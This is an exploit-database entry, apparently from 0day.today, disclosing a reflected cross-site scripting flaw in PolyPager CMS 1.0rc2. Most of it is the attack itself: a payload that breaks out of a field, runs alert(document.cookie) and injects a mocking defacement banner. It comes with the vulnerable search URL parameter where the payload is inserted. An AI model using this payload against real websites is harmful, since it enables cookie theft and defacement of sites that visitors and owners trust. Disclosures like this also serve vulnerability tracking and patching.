id: 11689
date: 04/09/2010
title: PolyPager CMS 1.0rc2 XSS Vulnerability
author: The_Exploited
cves: 

======================================
PolyPager CMS 1.0rc2 XSS Vulnerability
======================================

@Title: PolyPager CMS 1.0rc2 XSS Vulnerability

@Author: The_Exploited aka l3d aka Spoof

@Mail: spoof@live.it

@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/

@Exploit: "><script>alert(document.cookie);</script><marquee><b><font size=6><font color=red>This is a CMShit man :D<br>XSSed by <a href="www.forum.securityspl0its.com">The_Exploited</a></b></font></font></marquee>

@Demo: http://mysite.com/polypager/?page=_search&kw=[XSS]

@CMS Download: http://sourceforge.net/projects/polypager/

@CMS Version: 1.0rc2

@Date: 2010-04-09



#  0day.today [2023-03-27]  #